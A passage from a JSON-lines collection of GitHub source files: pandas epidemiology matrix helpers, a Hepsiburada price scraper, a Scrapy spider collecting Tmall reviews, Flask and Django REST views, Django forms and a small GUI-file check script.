print(\"Error: Pandas package not available.\")\nelse:\n pandasPresent = True\n import pandas as pd\n\nimport collections\nimport inspect\n\n\ndef phjRemoveUnwantedRows(phjDF,\n phjColumnNamesList,\n phjPrintResults = False):\n \n # Remove any rows with one or more NaN values\n phjNumberRowsPreNaN = len(phjDF.index)\n \n phjDF = phjDF.dropna(how = 'any').reset_index(drop = True)\n \n phjNumberRowsPostNaN = len(phjDF.index)\n \n if phjPrintResults == True:\n print('Number of rows removed with NaN values = ', phjNumberRowsPreNaN - phjNumberRowsPostNaN)\n print('\\n')\n print('Dataframe with NaN values removed')\n print(phjDF)\n print('\\n')\n \n \n # Convert each column to numeric values - strings will be converted to NaN and removed\n phjNumberRowsPreStrings = len(phjDF.index)\n \n for c in phjColumnNamesList:\n phjDF[c] = pd.to_numeric(phjDF[c],errors = 'coerce')\n \n phjDF = phjDF.dropna(how = 'any').reset_index(drop = True)\n \n phjNumberRowsPostStrings = len(phjDF.index)\n \n if phjPrintResults == True:\n print('Number of rows removed due to containing string values = ', phjNumberRowsPreStrings - phjNumberRowsPostStrings)\n print('\\n')\n print('Dataframe with strings values removed')\n print(phjDF)\n print('\\n')\n\n\n # Convert all columns to integers\n for c in phjColumnNamesList:\n phjDF[c] = phjDF[c].astype(int)\n \n \n # Remove rows that contain values that are not zero or 1\n phjNumberRowsPreBinaryRange = len(phjDF.index)\n \n for c in phjColumnNamesList:\n phjDF['isin'] = phjDF[c].isin([0,1])\n phjDF = phjDF.loc[phjDF['isin'] == True,:]\n \n phjDF = phjDF.drop('isin', 1).reset_index(drop = True)\n \n phjNumberRowsPostBinaryRange = len(phjDF.index)\n\n if phjPrintResults == True:\n print('Number of rows removed due to values being out of range = ', phjNumberRowsPreBinaryRange - phjNumberRowsPostBinaryRange)\n print('\\n')\n print('Dataframe containing zero and 1 values only')\n print(phjDF)\n print('\\n')\n \n \n return phjDF[phjColumnNamesList].reset_index(drop = True)\n\n\n\ndef phjBinaryVarsToSquareMatrix(phjDataDF,\n phjColumnNamesList,\n phjOutputFormat = 'arr',\n phjPrintResults = False):\n \n try:\n phjDF = phjDataDF[phjColumnNamesList]\n \n except KeyError as e:\n print('A KeyError has occurred ({0}). Check that the column names provided exist in the dataframe.'.format(e))\n return None\n \n phjNumberRowsOriginal = len(phjDF.index)\n \n if phjPrintResults == True:\n print('Number of rows in original database = ', phjNumberRowsOriginal)\n print('\\n')\n print('Original dataframe')\n print(phjDF)\n print('\\n')\n \n # Remove rows where any values are missing, strings, or not a zero or 1\n phjDF = phjRemoveUnwantedRows(phjDF = phjDF,\n phjColumnNamesList = phjColumnNamesList,\n phjPrintResults = phjPrintResults)\n \n \n phjDF['rowSum'] = phjDF[phjColumnNamesList].sum(axis=1)\n \n # Create a blank square matrix (in dataframe form) with column and row indices the same\n phjTempMatrixDF = pd.DataFrame(columns=phjColumnNamesList,index=phjColumnNamesList)\n \n # Start by completing the diagonal\n # ================================\n # Use just those rows with only a single entry (i.e. only one variable is entered).\n # Create a series containing the name of the variable and the sum of entries.\n # (For some reason, if the dataframe contains one or more rows where rowSum equals 1 then\n # the series contains integers but, if there are no rowSum values equal to 1 (and, therefore, the values\n # sum of the columns equal zero), then the series contains floats. Use astype(int) to avoid issues.)\n phjTempSer = phjDF.loc[phjDF['rowSum']==1,phjColumnNamesList].sum(axis=0).astype(int)\n \n # Step through each diagonal cell in the matrix and enter tbe sum value\n for c in phjColumnNamesList:\n phjTempMatrixDF.loc[c,c]=phjTempSer[c]\n \n # Next fill in the rest of the matrix\n # ===================================\n # Step through each variable in the list and create a series consisting\n # of all OTHER variables and the number of entries or those variables\n for c in phjColumnNamesList:\n phjOtherCols = [i for i in phjColumnNamesList if i!=c]\n phjTempSer = phjDF.loc[(phjDF['rowSum']>1) & (phjDF[c]==1),phjOtherCols].sum(axis=0).astype(int)\n \n # For each row index, step through each column and add the data\n for oc in phjOtherCols:\n phjTempMatrixDF.loc[c,oc] = phjTempSer[oc]\n \n if phjPrintResults == True:\n print('Square matrix')\n print(phjTempMatrixDF)\n print('\\n')\n \n if phjOutputFormat == 'arr':\n return phjTempMatrixDF.values\n \n elif phjOutputFormat == 'df':\n return phjTempMatrixDF\n \n else:\n print('The phjOutputFormat parammeter was set to an unknown value (\\'{0}\\'). The return value was set to None.'.format(phjOutputFormat))\n print('\\n')\n return None\n\n\n\ndef phjLongToWideBinary(phjDF,\n phjGroupbyVarName,\n phjVariablesVarName,\n phjValuesDict = {0:0,1:1},\n phjPrintResults = False):\n # This function converts a dataframe containing a grouping variable and a variable\n # containing a series of factors that may or may not be present and converts to a\n # wide dataframe containing a series of binary variables indicating whether the factor\n # is present or not.\n # For example, it converts:\n #\n # X Y\n # 0 1 a\n # 1 1 b\n # 2 1 d\n # 3 2 b\n # 4 2 c\n # 5 3 d\n # 6 3 e\n # 7 3 a\n # 8 3 f\n # 9 4 b\n # \n # to:\n # X a b d c e f\n # 0 1 1 1 1 0 0 0\n # 1 2 0 1 0 1 0 0\n # 2 3 1 0 1 0 1 1\n # 3 4 0 1 0 0 0 0\n \n \n # Check function parameters are set correctly\n try:\n # Check whether required parameters have been set to correct type\n assert isinstance(phjDF,pd.DataFrame), \"Parameter, 'phjDF' needs to be a Pandas dataframe.\"\n assert isinstance(phjGroupbyVarName,str), \"Parameter 'phjGroupbyVarName' needs to be a string.\"\n assert isinstance(phjVariablesVarName,str), \"Parameter 'phjVariablesVarName' needs to be a string.\"\n assert isinstance(phjValuesDict,collections.Mapping), \"Parameter 'phjValuesDict' needs to be a dict.\" # collections.Mapping will work for dict(), collections.OrderedDict() and collections.UserDict() (see comment by Alexander Ryzhov at https://stackoverflow.com/questions/25231989/how-to-check-if-a-variable-is-a-dictionary-in-python.\n \n # Check whether arguments are set to allowable values\n for k,v in phjValuesDict.items():\n assert k in [0,1], \"The key values in phjValuesDict need to either 0 or 1.\"\n \n assert isinstance(phjPrintResults,bool), \"Parameter 'phjPrintResults' needs to be a boolean (True, False) value.\"\n \n # Check that referenced columns exist in the dataframe\n assert phjGroupbyVarName in phjDF.columns, \"The column name 'phjGroupbyVarName' does not exist in dataframe.\"\n assert phjVariablesVarName in phjDF.columns, \"The column name 'phjVariablesVarName' does not exist in dataframe.\"\n \n except AssertionError as e:\n # Set return value to none\n phjScratchDF = None\n \n # If function has been called directly, present message.\n if inspect.stack()[1][3] == '':\n print(\"An AssertionError occurred in {fname}() function. ({msg})\\n\".format(msg = e,\n fname = inspect.stack()[0][3]))\n \n # If function has been called by another function then modify message and re-raise exception\n else:\n print(\"An AssertionError occurred in {fname}() function when called by {callfname}() function. ({msg})\\n\".format(msg = e,\n fname = inspect.stack()[0][3],\n callfname = inspect.stack()[1][3]))\n raise\n \n else:\n # Create a scratch DF with appropriate rows and columns, filled with zero\n phjScratchDF = pd.DataFrame(index = pd.Series(phjDF[phjGroupbyVarName].unique()),\n columns = list(phjDF[phjVariablesVarName].unique())).fillna(0)\n\n phjScratchDF.index.name = phjGroupbyVarName\n\n # Within each group, create a list contain all variables\n phjGroup = phjDF[[phjGroupbyVarName,phjVariablesVarName]].groupby(phjGroupbyVarName).agg(lambda phjRow: list(phjRow))\n\n # Step through each group and change each variable contained in the list of present variables with a 1\n for g in phjGroup.index.values.tolist():\n phjScratchDF.loc[g,phjGroup.loc[g,phjVariablesVarName]] = 1\n \n # This step replaces the default 0 and 1 with user-defined values. It should only be\n # run if phjValuesDict has been set to something other than default. Check whether\n # a passed dict is the same as the default (even if the order of elements has changed).\n # If simply comparing one dict with another then {0:0,1:1} will be seen to be the\n # same as {0:False,1:True}. But for the purposes of this exercise, those 2 dicts should\n # be seen to be different. Therefore, convert the values is both dicts to strings\n # before comparing.\n if {k:str(v) for k,v in phjValuesDict.items()} != {k:str(v) for k,v in {0:0,1:1}.items()}:\n phjScratchDF = phjScratchDF.replace(phjValuesDict)\n \n phjScratchDF = phjScratchDF.reset_index(drop = False)\n \n finally:\n # Return phjScratchDF which will be a dataframe if successful or None if not\n return phjScratchDF\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lvphj/epydemiology","sub_path":"epydemiology/phjMatrices.py","file_name":"phjMatrices.py","file_ext":"py","file_size_in_byte":10918,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"9700900126","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport sys\r\n\r\nurl = input(\"url: \")\r\n\r\ntry:\r\n r = requests.get(url) #http response code\r\n httpHeaders = r.status_code #http response code\r\nexcept Exception as e:\r\n print('Başarısız url')\r\n sys.exit(0)\r\n\r\nif httpHeaders == 200:\r\n\r\n request = urllib.request.Request(url) # url'ye istek\r\n response = urllib.request.urlopen(request) # isteğin cevaplanması\r\n the_page = response.read() # sayfa okuma\r\n theText = the_page.decode('utf-8') # alınan sayfanın utf-8 dönüştürümü\r\n\r\n soup = BeautifulSoup(theText, 'html.parser')\r\n\r\n for i in soup.find_all('span', {\"data-bind\": \"markupText:'currentPriceBeforePoint'\"}):\r\n for j in soup.find_all('span', {\"data-bind\": \"markupText:'currentPriceAfterPoint'\"}):\r\n print(\"Sonuç:\", i.text + ',' + j.text, \"TL\")\r\n\r\nelse:\r\n print('Başarısız url')\r\n\r\n\r\n\r\n\r\n","repo_name":"behlulboluk/Hepsiburada-Scraper","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1701854187","text":"from scrapy.spiders import CrawlSpider\nfrom scrapy.http import Request\nfrom selenium import webdriver\nimport os\nfrom scrapy.selector import Selector\nimport time\nimport taobaospider.tool as tool\nimport json\nimport re\nimport urllib.request\nimport pandas as pd\n\ndef get_data(driver):\n user_id = Selector(text=driver.page_source).xpath(u'//div[@class=\"shop\"]/a/@data-userid').extract()\n data_nid = Selector(text=driver.page_source).xpath(u'//div[@class=\"shop\"]/a/@data-nid').extract()\n data=list(zip(user_id,data_nid))\n return data\n\n\nclass Spiders(CrawlSpider):\n name='taobaospider'\n allowed_domains=['tmall.com']\n '''\n chrome_driver=chrome_driver = os.path.abspath(r\"C:/Program Files (x86)/Google/Chrome/Application/chromedriver.exe\")\n os.environ[\"webdriver.chrome.driver\"] = chrome_driver\n driver=webdriver.Chrome(chrome_driver)\n driver.maximize_window()\n url='https://s.taobao.com/search?q=%E4%BC%91%E9%97%B2%E5%A4%B9%E5%85%8B%E7%94%B7&imgfile=&js=1&stats_click=search_radio_all%3A1&initiative_id=staobaoz_20170410&ie=utf8'\n driver.get(url)\n ID=[]\n for i in range(99):\n for id in get_data(driver):\n data='%s,%s' %(id[0],id[1])\n ID.append(data)\n tool.GetFile('shop_id',data,3,50000)\n driver.find_element_by_xpath('//*[@id=\"mainsrp-pager\"]/div/div/div/ul/li[last()]/a').click()\n time.sleep(20)\n '''\n '''\n start_urls=[]\n with open('C:/Users/Administrator/Desktop/taobao/休闲男装/taobao_shop_id_0.txt','r',encoding='utf-8') as f:\n for line in f:\n start_urls.append(line.strip().replace('\\n',''))\n ID=set(start_urls)\n '''\n #'''\n # start_urls=['https://rate.tmall.com/list_detail_rate.htm?itemId=10496300260&sellerId=707199638¤tPage=1&tagId=620']\n #start_urls = ['707199638,10496300260,620']\n #ID = set(start_urls)\n start_urls = []\n with open('C:/Users/Administrator/Desktop/taobao/休闲男装/taobao_tags_0.txt', 'r', encoding='utf-8') as f:\n for line in f:\n temp=[]\n temp.append(line.split('[}')[0])\n temp.append(line.split('[}')[1])\n temp.append(line.split('[}')[2])\n temp.append(line.split('[}')[-1])\n start_urls.append(','.join(temp))\n ID = set(start_urls)\n #'''\n def start_requests(self):\n while self.ID.__len__():\n id=self.ID.pop()\n seller_id=id.split(',')[0]\n item_id=id.split(',')[1]\n tag_id = id.split(',')[2]\n mark = id.split(',')[-1]\n content_url = 'http://rate.tmall.com/list_detail_rate.htm?itemId=%s&sellerId=%s¤tPage=1&tagId=%s' % ( item_id, seller_id, tag_id)\n yield Request(url=content_url,meta={'parameter': id},dont_filter=True,callback=self.parse1)#如果不加dont_filter,按照默认的会重定向被过滤掉,因为它重定向会回到原来的网址,scrapy认为是重复的url就给我过滤掉了\n #tags_url = 'https://rate.tmall.com/listTagClouds.htm?itemId=%s&isAll=true&isInner=true' % item_id\n #yield Request(url=tags_url,meta={'ID':id} ,callback=self.parse_0)\n\n\n def parse_0(self, response):\n id = response.meta['ID']\n seller_id = id.split(',')[0]\n item_id = id.split(',')[1]\n mydata = response.body_as_unicode()\n myjson = re.findall('\\\"tagClouds\\\":(.*?),\\\"userTagCloudList\\\"', mydata)[0]\n for i in json.loads(myjson):\n tagid=i['id']\n count=i['count']\n tag=i['tag']\n posi=i['posi']\n data='%s[}%s[}%s[}%s[}%s[}%s' %(seller_id,item_id,tagid,count,tag,posi)\n print(data);\n tool.GetFile('tags',data,3,10000)\n #content_url = 'http://rate.tmall.com/list_detail_rate.htm?itemId=%s&sellerId=%s¤tPage=1&tagId=%s' % (item_id, seller_id, tagid)\n #parameter = id + ',%s' % tagid\n meta = {\n # 'dont_redirect': True, # 禁止网页重定向\n # 'handle_httpstatus_list': [301, 302], # 对哪些异常返回进行处理\n }\n #yield Request(url=content_url,meta={'parameter': parameter},dont_filter=True,callback=self.parse)\n\n\n def parse1(self, response):\n mydata=response.body_as_unicode()\n try:\n mypage = re.findall('\\\"paginator\\\":(.*?),\\\"rateCount\\\"', mydata)[0]\n page=json.loads(mypage)['page']\n last_page=json.loads(mypage)['lastPage']\n myjson = re.findall('\\\"rateList\\\":(.*?),\\\"searchinfo\\\"',mydata)[0]\n except:\n print(response.url)\n\n for i in json.loads(myjson):\n id=i['id']\n usernick = i['displayUserNick']\n sku = i['auctionSku']\n ratecontent = i['rateContent']\n tags=re.findall('(.*?)',ratecontent)\n ratedate = i['rateDate']\n parameter = response.meta['parameter']\n seller_id = parameter.split(',')[0]\n item_id = parameter.split(',')[1]\n tag_id=parameter.split(',')[2]\n mark=parameter.split(',')[-1]\n data = '%s[}%s[}%s[}%s[}%s[}%s[}%s[}%s[}%s[}%s' %(seller_id,item_id,tag_id,id,usernick,sku,ratecontent.replace('','').replace('',''),','.join(tags),mark.replace('\\n',''),ratedate)\n #print(data)\n tool.GetFile('user_content', data, 3, 10000)\n if page!=last_page:\n content_url = 'http://rate.tmall.com/list_detail_rate.htm?itemId=%s&sellerId=%s¤tPage=%d&tagId=%s' % (item_id, seller_id, int(page)+1,tag_id)\n #print(content_url)\n yield Request(url=content_url,meta={'parameter':parameter},dont_filter=True,callback=self.parse1)","repo_name":"he305461055/taobaospiders","sub_path":"taobaospider/spiders/taobaospider.py","file_name":"taobaospider.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5180156069","text":"from flask import request\nfrom flask_restx import Resource\n\nfrom ..util.dto import NetworkDto\nfrom app.main.service.network_service import save_new_network, get_all_networks, get_a_network, delete_a_network, save_update\nfrom typing import Dict, Tuple\n\napi = NetworkDto.api\n_network = NetworkDto.network\n\n@api.route('/')\nclass NetworkList(Resource):\n @api.doc('list_of_networks')\n @api.marshal_list_with(_network, envelope='data')\n def get(self):\n return get_all_networks()\n\n @api.expect(_network, validate=True)\n @api.response(201, 'Network successfully created.')\n @api.doc('create a new network')\n def post(self) -> Tuple[Dict[str, str], int]:\n data = request.json\n return save_new_network(data=data)\n\n\n@api.route('/')\n@api.param('id', 'The Network identifier')\n@api.response(404, 'Network not found.')\nclass Network(Resource):\n @api.doc('get a network')\n @api.marshal_with(_network)\n def get(self, id):\n network = get_a_network(id)\n if not network:\n api.abort(404, 'Network not found.')\n else:\n return network\n\n @api.doc('delete a network')\n def delete(self, id):\n network = get_a_network(id)\n if not network:\n api.abort(404, 'Network not found.')\n else:\n delete_a_network(network)\n return ({\n 'status': 'success',\n 'message': 'Successfully deleted network.'\n }, 200)\n\n @api.expect(_network, validate=True)\n @api.response(201, 'Network successfully updated.')\n @api.doc('update a network')\n def post(self, id) -> Tuple[Dict[str, str], int]:\n data = request.json\n return save_update(id, data=data)","repo_name":"Cragady/hire-career-path","sub_path":"server/app/main/controller/network_controller.py","file_name":"network_controller.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75031241789","text":"''' Company operations '''\n\n# Django Rest Framework\nfrom rest_framework import status, mixins, viewsets\nfrom rest_framework.response import Response\n\n# Models\nfrom companies.models import Company\n\n# Serializer\nfrom companies.serializers import CompanySerializer\n\n\nclass CompanyViewSet(mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.DestroyModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet):\n\n queryset = Company.objects.all()\n serializer_class = CompanySerializer\n\n def convert_str_to_list(self,data):\n ''' Convert an array of numbers save in the data base to a list as a response '''\n new_list = []\n for num in data.values:\n try:\n new_list.append(int(num))\n except:\n pass\n\n return new_list\n\n def list(self, request, *args, **kwargs):\n ''' List all the companies with pagination'''\n\n queryset = Company.objects.all()\n for q in queryset:\n q.values = self.convert_str_to_list(q)\n\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n serializer = CompanySerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, *args, **kwargs):\n ''' Show a Company data '''\n\n instance = self.get_object()\n instance.values = self.convert_str_to_list(instance)\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def create(self, request, *args, **kwargs):\n ''' Recieve a data, validated and create a new company '''\n\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.validated_data)\n return Response(serializer.validated_data, status=status.HTTP_201_CREATED, headers=headers)\n\n\n def update(self, request, *args, **kwargs):\n ''' Handel update and partial update for a model instance '''\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n instance.values = self.convert_str_to_list(instance)\n serializer = self.get_serializer(instance, data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n self.perform_update(serializer)\n\n if getattr(instance, '_prefetched_objects_cache', None):\n # If 'prefetch_related' has been applied to a queryset, we need to\n # forcibly invalidate the prefetch cache on the instance.\n instance._prefetched_objects_cache = {}\n\n return Response(serializer.data)","repo_name":"LaloRivero/django_api_test","sub_path":"companies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10215680138","text":"from django import forms\nfrom ckeditor_uploader.fields import RichTextUploadingField\nfrom django.core.exceptions import ValidationError\nfrom django.forms import ModelForm, BooleanField, CharField, Form, Textarea, TextInput\n\nfrom .models import Post, Comment\n\n\nclass PostForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(PostForm, self).__init__(*args, **kwargs)\n # self.fields['cat'] = forms.ModelChoiceField(label='Пост', empty_label='ghj')\n\n class Meta:\n model = Post\n fields = ('title', 'cat', 'content', 'image',)\n widgets = {'title': forms.TextInput(attrs={'size': '80'}),\n 'image': forms.FileInput(attrs={'size': '40'}),\n }\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ('text',)\n\n def __init__(self, *args, **kwargs):\n super(CommentForm, self).__init__(*args, **kwargs)\n self.fields['text'].label = 'Отклик'\n\n\nclass CommentAddForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = (\"text\", \"author\", \"post\")\n\n def __init__(self, *args, **kwargs):\n super(CommentAddForm, self).__init__(*args, **kwargs)\n self.fields['text'].label = 'Новый отклик'\n","repo_name":"gim7y/mod13.7","sub_path":"project/bboard/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33012348598","text":"#!/usr/bin/env python3\n\nimport glob\nimport re\nimport os\n\nempty_re = re.compile(\"WebView[^/>]+/>\")\nfor filename in glob.glob(\"../guis/*.xml\"):\n with open(filename) as f:\n if empty_re.search(f.read()):\n print(\"Empty WebView in %s !!\" % filename)\n os.rename(filename, filename + \".err\")\n imgname = filename.replace('xml', 'png')\n if not os.path.exists(imgname):\n print(\"missing %s\" % imgname)\n actname = filename.replace('xml', 'txt')\n if not os.path.exists(actname):\n print(\"missing %s\" % actname)\n# if actname.count('_') == 1:\n# for i in range(5):\n# ret = os.system(\"cp %s %s\" % (actname.replace(\"_\", \"_%d_\" % i), actname))\n# if ret == 0:\n# break;\n","repo_name":"columbia/appflow","sub_path":"src/chk.py","file_name":"chk.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"60"}